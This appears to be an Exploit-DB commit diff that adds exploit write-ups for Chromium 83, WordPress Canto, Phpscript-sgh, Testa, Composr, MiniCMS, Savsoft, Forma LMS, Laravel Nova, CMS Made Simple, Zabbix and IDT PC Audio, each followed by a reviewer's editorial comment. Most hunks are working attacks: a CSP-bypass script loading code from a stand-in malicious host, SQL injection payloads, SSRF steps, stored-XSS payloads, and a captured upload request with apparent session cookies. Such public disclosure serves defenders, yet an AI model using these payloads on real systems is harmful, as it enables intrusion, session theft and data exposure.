DB: 2020-12-05

13 changes to exploits/shellcodes

IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path
Chromium 83 - Full CSP Bypass
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection
MiniCMS 1.10 - 'content box' Stored XSS
Testa Online Test Management System 3.4.7 - 'q' SQL Injection
Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting
Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
Laravel Nova 3.7.0 - 'range' DoS
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
This commit is contained in:
Offensive Security 2020-12-05 05:01:54 +00:00
parent d560e654b7
commit 045c2fe1ae
14 changed files with 388 additions and 1 deletions

@ -1,4 +1,4 @@
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Date: 2020-08-31
# Exploit Author: Jonatan Schor and Uriel Yochpaz
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway

@ -0,0 +1,34 @@
#Title: Chromium 83 - Full CSP Bypass
#Date: 02/09/2020
#Exploit Author: Gal Weizman
#Vendor Homepage: https://www.chromium.org/
#Software Link: https://download-chromium.appspot.com/
#Version: 83
#Tested On: Mac OS, Windows, iPhone, Android
#CVE: CVE-2020-6519
(function(){
var payload = `
top.SUCCESS = true;
var o = document.createElement("object");
o.data = \`http://malicious.com/bypass-object-src.html\`;
document.body.appendChild(o);
var i = document.createElement("iframe");
i.src = \`http://malicious.com/bypass-child-src.html\`;
document.body.appendChild(i);
var s = document.createElement("script");
s.src = \`http://malicious.com/bypass-script-src.js\`;
document.body.appendChild(s);
`;
document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
setTimeout(() => {
if (!top.SUCCESS) {
XXX.contentWindow.eval(payload);
}
});
}())
// further information: https://github.com/weizman/CVE-2020-6519
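Review bot: the header block uses "#" comment markers, but the CSV hunk files this as exploits/multiple/local/49195.js; in a .js file those eight lines are syntax errors, so the file cannot be loaded as written. Move the header into "//" comments like the trailing "further information" line. The header also gives only "Version: 83" and no fixed version, so a reader cannot tell from the file which Chromium releases are no longer affected.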

@ -0,0 +1,26 @@
# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
# Date: 03/12/2020
# Exploit Author: Pankaj Verma (_p4nk4j)
# Vendor Homepage: https://www.canto.com/integrations/wordpress/
# Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin
# Version: 1.3.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978
Description:-
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities.
It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter.
Vulnerable Parameters and Endpoints:-
https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain=
Steps To Reproduce:-
1. Start a Netcat Listener on any port For e.g. 4499
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain="
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter.
4. Observe the response we got from the Target on Attacker's Listener.
Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.
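Review bot: three CVE ids are listed but not mapped to the three endpoints (detail.php, get.php, tree.php), and the closing "Note" explains the trailing "?" only after step 3 has already relied on it. Suggest one line per CVE/endpoint pair and moving the "?" explanation next to step 3. The advisory also says nothing about remediation, e.g. that "subdomain" should be checked against an allow-list of expected values before any outbound request is built from it.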

@ -0,0 +1,36 @@
# Exploit Title: Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection
# Date: 2020-12-04
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/geraked/phpscript-sgh
# Software Link: https://github.com/geraked/phpscript-sgh
# Version: 0.1.0
# Tested on: Kali Linux
------------------------------------------------------------------------------------------------------------------------
Source code(localhost/admin/admins.php):
if ($_REQUEST['op']=='add') {
$id = $username = $password = $conf_password = $firstname = $lastname =
$email = $pic = $_SESSION['aapic'] = "";
}
else {
$result = $conn->query("SELECT * FROM sgh_admins WHERE
id=".test_input($_REQUEST['id'])." LIMIT 1");
$row = $result->fetch_assoc();
extract($row);
$_SESSION['aapic'] = $pic;
}
------------------------------------------------------------------------------------------------------------------------
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: op=edit&id=1 AND (SELECT 9367 FROM
(SELECT(SLEEP(5)))pBEE)&_pjax=#pjax-container
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: op=edit&id=-5015 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x536b4e4a775448674c73477175675a4c58476659474f524b535456706e7276474251424a4f67744b,0x717a626b71),NULL--
-&_pjax=#pjax-container
------------------------------------------------------------------------------------------------------------------------
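Review bot: the quoted admins.php excerpt shows test_input($_REQUEST['id']) concatenated straight into the SELECT, but the file never says what test_input() does; the listed payloads only make sense if it leaves SQL metacharacters intact, and that should be stated. The fix is also missing: cast id to an integer or use a prepared statement with a bound parameter. The UNION payload is wrapped so that the "NULL--" / "-&_pjax=" comment sequence spans two lines; anyone copying it line by line gets a different query than the one that was tested.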

@ -0,0 +1,33 @@
# Exploit Title: Testa Online Test Management System 3.4.7 - 'q' SQL Injection
# Date: 2020-07-21
# Google Dork: N/A
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://testa.cc
# Version: v3.4.7
# Tested on: Windows/Linux
# CVE: N/A
.:: Description ::.
Testa Helps You To make Online Exams.
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target Using Testa - Online Test Management System.
Step 2 - Click on List And Search Exams.
Step 3 - Inject Your Payloads in Search Field.
.:: Sample Request ::.
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost
Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 #
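Review bot: the sample request is internally inconsistent: "Content-Length: 8" while the body "p=1&q=..." is well over 100 bytes, and the request line is "POST / HTTP/1.1" against Host "localhost", so the actual search endpoint is not identified. Either correct the length to match the body or drop the header, and name the real path. The PoC also omits the response showing user() reflected in the page, which is the evidence the title rests on.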

@ -0,0 +1,16 @@
# Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
# Date: 3-12-2020
# Exploit Author: Parshwa Bhavsar
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.34
# Tested on: Windows 10/ Kali Linux
Steps To Reproduce :-
1. Install the CMS from the download link & configure it.
2. After configuration login with admin Credential .
3. You will notice “Add banner” in the top of the browser.
4. Click on it and Put XSS payload (any) in “Description” field.
5. Save it & Click on Home.
6. Every time any user visit the website , the XSS payload will trigger.
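Review bot: step 2 requires admin credentials, but the title does not carry "(Authenticated)" the way the CMS Made Simple entry in this same commit does; the required privilege belongs in the title and header so the severity is read correctly. The steps also have stray spaces before punctuation ("Credential .", "website ,").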

@ -0,0 +1,16 @@
# Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS
# Date: 2019-7-4
# Exploit Author: yudp
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link:https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# CVE :CVE-2019-13339
Payload<script>alert("3: "+document.domain)</script> In /MiniCMS/mc-admin/page-edit.php
POC:
1. Go to the page-edit page and input the payload into the content box ,click save button
2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded
3.After that, go to the page we have saved
4.Window will pop with the domain
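Review bot: the "Payload<script>..." line runs the payload and the affected path together with no separator, and the header lacks a "Tested on" line. Step 2 says the "+" must be URL-encoded when the request is edited, but the payload is only given in decoded form; state explicitly which form goes into the saved request so the PoC is reproducible.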

@ -0,0 +1,19 @@
# Exploit Title: Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting
# Date: 2020-09-02
# Exploit Author: Dhruv Patel(dhruvp111296)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Windows 10
Attack vector:
This vulnerability can results attacker to inject the XSS payload in admin
panel Custom Field section. And Inject JavaScript Malicious code & Steal
Users cookie
Vulnerable Parameters: title
Steps for reproduce:
1. Go to admin panels add custom fields page
2. Fill the Title name as <script>alert("HELLO XSS")</script> payload in title.
3. Now Click on Save we can see our payload gets executed.
4. All Users Can Show our Payload As a xss.
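Review bot: "Vulnerable Parameters: title" does not match the title's "field_title"; use the real form field name consistently. The attack-vector paragraph reads as a fragment ("This vulnerability can results attacker to inject..."), and step 4 ("All Users Can Show our Payload As a xss") is what establishes this as stored rather than self-XSS, so it should say where non-admin users see the custom field rendered.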

@ -0,0 +1,16 @@
# Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
# Date: 04-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.formalms.org/download.html
# Software Link: https://www.formalms.org/
# Version: 2.3
# Tested on: Windows 10/Kali Linux
Steps-To-Reproduce:
1. Go to the Forma LMS and login to your account.
2. Now go to the User Profile.
3. Now Edit the profile.
4. Put the below payload in first and last name:
"<script>alert(document.cookie)</script>"
5. Now click on Save button.
6. The XSS will be triggered.
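Review bot: the payload after step 4 is wrapped in double quotes, so it is unclear whether the quotes are part of the input; and the steps only show the editing user triggering the script on their own profile. To support "Stored" in the title, document where First/Last Name is rendered to other users (a user list or course roster, for instance); otherwise this reads as self-XSS.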

@ -0,0 +1,16 @@
# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS
# Date: June 22, 2020
# Exploit Author: iqzer0
# Vendor Homepage: https://nova.laravel.com/
# Software Link: https://nova.laravel.com/releases
# Version: Version v3.7.0
# Tested on: Manjaro / Chrome v83
An authenticated user can crash the application by setting a higher
value to the 'range' (default 30) parameter and sending simultaneous
requests (10 simultaneous requests was enough to DoS the server in my
testing)
Vulnerable URL:
https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000
Vulnerable Parameter: range
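Review bot: "Version: Version v3.7.0" repeats the word. Is "sum-orders" in the vulnerable URL a metric defined in the author's own test application rather than a Nova endpoint? If so the advisory should say so, because the path will differ per installation and only the "range" parameter is generic. A remediation note (a server-side upper bound on "range") is also missing.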

@ -0,0 +1,92 @@
# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
# Date: 04/12/2020
# Exploit Author: Eshan Singh
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads
# Version: cmsms v2.2.15
# Tested on: Windows/Kali Linux/Ubuntu
Description
----------------------
CMS Made Simple 2.2.15 allows an authenticated user with access to the
Content Manager to edit content and put persistent XSS payload using the
malicious SVG file. The user can get cookies from every authenticated user
who visits the website.
SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg
Steps to reproduce
-------------------
1. Login into the cmsms admin panel using the admin user.
2. then go to content > file manager > images, now upload the malicious svg
(
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg)
file.
3. now open the svg file location (
http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the
popup.
Burp Request
-------------
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------379224531139948695983200896304
Content-Length: 1040
Origin: http://127.0.0.1
Connection: close
Cookie:
a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D;
__c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="mact"
FileManager,m1_,upload,0
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="__c"
3d8ee0fbb464e874e82
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="disable_buffer"
1
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------379224531139948695983200896304--
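Review bot: the Cookie header in the Burp request carries what appears to be a real session cookie and "__c" token from the test instance; these should be redacted before publication. The first SVG payload block wraps 'stroke="#004400' and '"/>' across two lines, so a literal copy has a newline inside the attribute value (the copy inside the request body wraps differently). The description claims cookies of "every authenticated user who visits the website", while step 3 only shows the script firing when the uploaded SVG URL is opened directly; state where the SVG is embedded so that other users load it, or narrow the impact statement.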

@ -0,0 +1,33 @@
# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
# Date: 8/11/2020
# Exploit Author: Shwetabh Vishnoi
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/download
# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1
# CVE : CVE-2020-15803
Affected URL/endpoint(s):
http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check
Affected Param: <iframe src="http://localhost/hello.html" scrolling="auto"
id="iframe" class="widget-url" width="100%" height="100%"></iframe>
Description: The application contains a widget functionality within Global
View Dashboard which can be used by a malicious admin to propagate stored
cross site scripting attack. The “URL” widget iframe does not have any
inbuilt restrictions for the content executing within.
Impact: The malicious webpages within iframes can be used for hosting forms
for Phishing, malware propagation, forced redirections etc.
The affected Global View dashboard is displayed to all the users of the
application, so all the users will be affected with this vulnerability.
Reproduction Steps:
1. Login to the application with Admin
2. In Global View Dashboard, Add a widget
3. Select Type “URL”, fill any random values for Name, Refresh Interval.
4. Now, in the URL parameter, enter a malicious URL.
5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.)
6. The malicious webpage containing payload will be executed on the dashboard via iFrame.
7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection).
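Review bot: "Affected Param" gives an HTML iframe fragment rather than the name of the request parameter the URL widget posts, and the affected URL embeds a "sid=" session id that should be redacted. The "Affected Version" line lists the fixed rc versions across 3.0.x to 5.0.x, which is broader than the title "Zabbix 5.0.0"; align the two. The description's "malicious admin" means admin privileges are required, which belongs in the title.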

@ -0,0 +1,38 @@
# Exploit Title: IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path
# Discovery by: Diego Cañada
# Software link: https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/
# Discovery Date: 2020-12-03
# Tested Version: 1.0.6499.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home Single Language x64 ES
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i
"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto
# Service info:
C:\>sc qc StacSV
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: StacSV
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
GRUPO_ORDEN_CARGA : AudioGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Audio Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
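Review bot: the remediation is not stated anywhere: the "#Exploit" section describes the precondition (a local user able to write into the service path) but not the fix, which is quoting the service's binary path (NOMBRE_RUTA_BINARIO) so that "C:\Program Files\IDT\WDM\STacSV64.exe" is no longer parsed at the space. The sc qc output is localized Spanish; an English label for the key fields (binary path, start type, service start name) would help readers.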

@ -11219,6 +11219,8 @@ id,file,description,date,author,type,platform,port
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
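Review bot: 49191 is inserted two rows after 49157, which covers the same STacSV service and the same Unquoted Service Path at 1.0.6433.0 by a different author; unless the 1.0.6499.0 build differs materially this is a duplicate and should be flagged as such. Both new rows carry date 2020-12-04 while the commit is dated 2020-12-05. 49195 (Chromium CSP bypass) is classified local/multiple although the file is browser-side JavaScript that a web page delivers, so the "local" type is worth a second look.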
@ -43406,3 +43408,13 @@ id,file,description,date,author,type,platform,port
49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,
49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php,
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,
49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php,
49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,
49196,exploits/php/webapps/49196.txt,"Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting",2020-12-04,"Dhruv Patel",webapps,php,
49197,exploits/php/webapps/49197.txt,"Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting",2020-12-04,"Hemant Patidar",webapps,php,
49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
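Review bot: ids 49200 and 49201 are skipped between 49199 and 49202 with no explanation. The author of 49192 is written "KeopssGroup0day_Inc" while the file header reads "KeopssGroup0day,Inc"; the comma was replaced rather than quoting the field as the other multi-word authors are ("Ultra Security Team"), so the CSV value no longer matches the advisory.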
